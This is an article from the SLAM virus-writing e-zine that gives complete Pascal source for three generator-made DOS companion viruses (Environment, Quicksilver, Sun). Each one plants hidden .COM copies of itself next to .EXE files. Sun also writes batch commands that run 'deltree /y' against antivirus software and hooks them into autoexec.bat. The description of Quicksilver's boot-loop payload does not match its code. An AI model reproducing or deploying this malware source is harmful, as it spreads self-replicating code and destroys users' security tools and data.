Copy Link
Add to Bookmark
Report
SLAM3.011: LoNIG Viruses Sun, Environment and Quicksilver (sources)
Examples of virii generated with LoNIG:
1. PAS.Environment
It is a harmless Companion virus that shows the a warning messy about our environment.
I took this as a chance to give this warning to all reading the SLAM mag. Actually, there is no other payload ==> good for testing a PAS virus.
====cut here=================================================================
{-------------------- This virus was created by LoNVG ------------------------ }
{Lord of nAvAn's VIRII GENERATOR was written 4 educational purposes only ! }
{Having this auto-generated virus on your computer you accept that YOU (--> }
{and ONLY you) are responsible for your actions with that virus!!!If you do }
{NOT accept this you must delete it. But anyway, don't yell at *me* if your }
{philes are damaged. Actually, I'm NOT responsible for ANY troubles caused }
{by LoNVG!}
{----------------------------------------------------------------------------- }
Program environment;
Uses Dos,Crt;
{$M 59999,0,8000}
Var Inf,Inf2:Searchrec; {Used in the EXE and phile_exist routines }
Infected:Boolean; {Is a phile infected? }
Params:Byte; {Loop Index for adding all parameters together }
All_Parameters:String; {This string contains the whole list of parameters
originally passed to the program }
P:PathStr; {Used}
D:DirStr; {in}
N:NameStr; {the}
E:ExtStr; {FSplit procedure.}
Procedure Check_Infected(Path:String);
Begin
FSplit(Inf.Name,D,N,E);
FindFirst(Path+N+'.COM',Anyfile,Inf2);
Infected:=(DosError=0);
End;
Procedure CopyFile(SourceFile, TargetFile:string);
var
Source,
Target : file;
BRead,
Bwrite : word;
FileBuf : array[1..2048] of char;
Begin
Assign(Source,SourceFile);
SetFattr(Source,$20); {Set the phile attributes of the}
{hidden COM companion we're going}
{to be copying to archive so that}
{it's possible read it. }
{$I-}
Reset(Source,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the source phile! }
End;
Assign(Target,TargetFile);
{$I-}
Rewrite(Target,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the target phile! }
End;
Repeat
BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead);
BlockWrite(Target,FileBuf,Bread,Bwrite);
Until (Bread = 0) or (Bread <> BWrite);
Close(Source);
Close(Target);
SetFattr(Source,3); {Set companion attribute to hidden}
SetFattr(Target,3);
End;{CopyFile}
Procedure Find_Infect(Path:String);
{Find and Infect!}
Begin
FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! }
While DosError=0 Do Begin
Infected:=False;
Check_Infected(Path); { Check if the .EXE found is already infected. }
If Not Infected then Begin
CopyFile(ParamStr(0),Path+N+'.COM');
End;
FindNext(Inf);
End;
End;{Find_Infect}
Procedure display;
Var text:string;
Begin
Clrscr;
randomize;
textcolor(random(10)+2);
text:='The time is up!! We NOW MUST save our environment!!! Otherwise it''ll too late!';
writeln(text);
readln;
end;
{displays the text ØThe time is up!! We NOW MUST save our environment!!! Otherwise it''ll too late!Æ}
{--------------------------------------------}
Begin
display;
Find_Infect('C:\DOS\');
Find_Infect('C:\MSDOS\');
Find_Infect('');
FSplit(ParamStr(0),D,N,E);
All_Parameters:=''; {Vars must be initialized}
For Params:=1 To ParamCount
do All_Parameters:=All_Parameters+ParamStr(Params)+' ';
Exec(D+N+'.EXE',All_Parameters); {Execute the phile that the user}
End.
====cut here=================================================================2. PAS.Quicksilver
This guy fakes the autoexec.bat so that the boot process will get into an endless loop. I took this name since I like NJ's WM.Quicksilver very much!! Now the Pascal variant. I hope you don't mind, NJ! ;))
====cut here=================================================================
{-------------------- This virus was created by LoNVG ------------------------ }
{Lord of nAvAn's VIRII GENERATOR was written 4 educational purposes only ! }
{Having this auto-generated virus on your computer you accept that YOU (--> }
{and ONLY you) are responsible for your actions with that virus!!!If you do }
{NOT accept this you must delete it. But anyway, don't yell at *me* if your }
{philes are damaged. Actually, I'm NOT responsible for ANY troubles caused }
{by LoNVG!}
{----------------------------------------------------------------------------- }
Program quicksilver;
Uses Dos,Crt;
{$M 59999,0,8000}
Var Inf,Inf2:Searchrec; {Used in the EXE and phile_exist routines }
Infected:Boolean; {Is a phile infected? }
Params:Byte; {Loop Index for adding all parameters together }
All_Parameters:String; {This string contains the whole list of parameters
originally passed to the program }
P:PathStr; {Used}
D:DirStr; {in}
N:NameStr; {the}
E:ExtStr; {FSplit procedure.}
Procedure Check_Infected(Path:String);
Begin
FSplit(Inf.Name,D,N,E);
FindFirst(Path+N+'.COM',Anyfile,Inf2);
Infected:=(DosError=0);
End;
Procedure CopyFile(SourceFile, TargetFile:string);
var
Source,
Target : file;
BRead,
Bwrite : word;
FileBuf : array[1..2048] of char;
Begin
Assign(Source,SourceFile);
SetFattr(Source,$20); {Set the phile attributes of the}
{hidden COM companion we're going}
{to be copying to archive so that}
{it's possible read it. }
{$I-}
Reset(Source,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the source phile! }
End;
Assign(Target,TargetFile);
{$I-}
Rewrite(Target,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the target phile! }
End;
Repeat
BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead);
BlockWrite(Target,FileBuf,Bread,Bwrite);
Until (Bread = 0) or (Bread <> BWrite);
Close(Source);
Close(Target);
SetFattr(Source,3); {Set companion attribute to hidden}
SetFattr(Target,3);
End;{CopyFile}
Procedure Find_Infect(Path:String);
{Find and Infect!}
Begin
FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! }
While DosError=0 Do Begin
Infected:=False;
Check_Infected(Path); { Check if the .EXE found is already infected. }
If Not Infected then Begin
CopyFile(ParamStr(0),Path+N+'.COM');
End;
FindNext(Inf);
End;
End;{Find_Infect}
{--------------------------------------------}
Begin
Find_Infect('C:\DOS\');
Find_Infect('C:\MSDOS\');
Find_Infect('');
FSplit(ParamStr(0),D,N,E);
All_Parameters:=''; {Vars must be initialized}
For Params:=1 To ParamCount
do All_Parameters:=All_Parameters+ParamStr(Params)+' ';
Exec(D+N+'.EXE',All_Parameters); {Execute the phile that the user}
End.
====cut here=================================================================3. PAS.Sun
This caliber kills several AV progs which are available now. Even FWIN --> a good chance for you, NJ, to continue your macro viriis he he;)
====cut here=================================================================
{-------------------- This virus was created by LoNIG ------------------------ }
{Lord of nAvAn's INVASION GENERATOR was written 4 educational purposes only ! }
{Having this auto-generated virus on your computer you accept that YOU (--> }
{and ONLY you) are responsible for your actions with that virus!!!If you do }
{NOT accept this you must delete it. But anyway, don't yell at *me* if your }
{philes are damaged. Actually, I'm NOT responsible for ANY troubles caused }
{by LoNIG!}
{----------------------------------------------------------------------------- }
Program sun;
Uses Dos,Crt;
{$M 59999,0,8000}
Var Inf,Inf2:Searchrec; {Used in the EXE and phile_exist routines }
Infected:Boolean; {Is a phile infected? }
Params:Byte; {Loop Index for adding all parameters together }
All_Parameters:String; {This string contains the whole list of parameters
originally passed to the program }
P:PathStr; {Used}
D:DirStr; {in}
N:NameStr; {the}
E:ExtStr; {FSplit procedure.}
Procedure Check_Infected(Path:String);
Begin
FSplit(Inf.Name,D,N,E);
FindFirst(Path+N+'.COM',Anyfile,Inf2);
Infected:=(DosError=0);
End;
Procedure CopyFile(SourceFile, TargetFile:string);
var
Source,
Target : file;
BRead,
Bwrite : word;
FileBuf : array[1..2048] of char;
Begin
Assign(Source,SourceFile);
SetFattr(Source,$20); {Set the phile attributes of the}
{hidden COM companion we're going}
{to be copying to archive so that}
{it's possible read it. }
{$I-}
Reset(Source,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the source phile! }
End;
Assign(Target,TargetFile);
{$I-}
Rewrite(Target,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the target phile! }
End;
Repeat
BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead);
BlockWrite(Target,FileBuf,Bread,Bwrite);
Until (Bread = 0) or (Bread <> BWrite);
Close(Source);
Close(Target);
SetFattr(Source,3); {Set companion attribute to hidden}
SetFattr(Target,3);
End;{CopyFile}
Procedure Find_Infect(Path:String);
{Find and Infect!}
Begin
FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! }
While DosError=0 Do Begin
Infected:=False;
Check_Infected(Path); { Check if the .EXE found is already infected. }
If Not Infected then Begin
CopyFile(ParamStr(0),Path+N+'.COM');
End;
FindNext(Inf);
End;
End;{Find_Infect}
Procedure retro;
Var hb, autoexec:text;
Begin
assign(hb,'c:\ˇ.bat'); {now let's make the ASCII255.BAT}
rewrite(hb);
append(hb);
writeln(hb,'@echo off');
writeln(hb,'deltree /y anyFUTUREavPROG*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y antiv*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y av*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y fp*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y fprot*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y f-prot*.* ');
writeln(hb,'@echo off');
writeln(hb,'deltree /y scan*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y suspi*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y drsol*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y tbav*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y mcaf*.*');
writeln(hb,'@echo off');
{A messy for the next boot process...}
writeln(hb,'echo No Av-PrOg WiLl ExIsT iN fUtUrE!!!');
writeln(hb,'echo Brought to you by the giant [SLAM] vx group');
writeln(hb,'pause');
close(hb);
assign(autoexec,'c:\autoexec.bat'); {prepare autoexec.bat...}
reset(autoexec);
append(autoexec);
writeln(autoexec,'ˇ');
close(autoexec);
end;
{--------------------------------------------}
Begin
retro;
Find_Infect('C:\DOS\');
Find_Infect('C:\MSDOS\');
Find_Infect('');
FSplit(ParamStr(0),D,N,E);
All_Parameters:=''; {Vars must be initialized}
For Params:=1 To ParamCount
do All_Parameters:=All_Parameters+ParamStr(Params)+' ';
Exec(D+N+'.EXE',All_Parameters); {Execute the phile that the user}
End.
====cut here=================================================================
Yeah, have fun with these examples and ALWAYS REMEMBER: Viriis are a form of ALIFE. Therefore handle them with care if you don't want a loss of data or whatever! ;)
Of course it's possible to generate virii that have no special payload except replication.
CU in the next mag
- Lord of nAvAn [SLAM] / Pascal vx guy
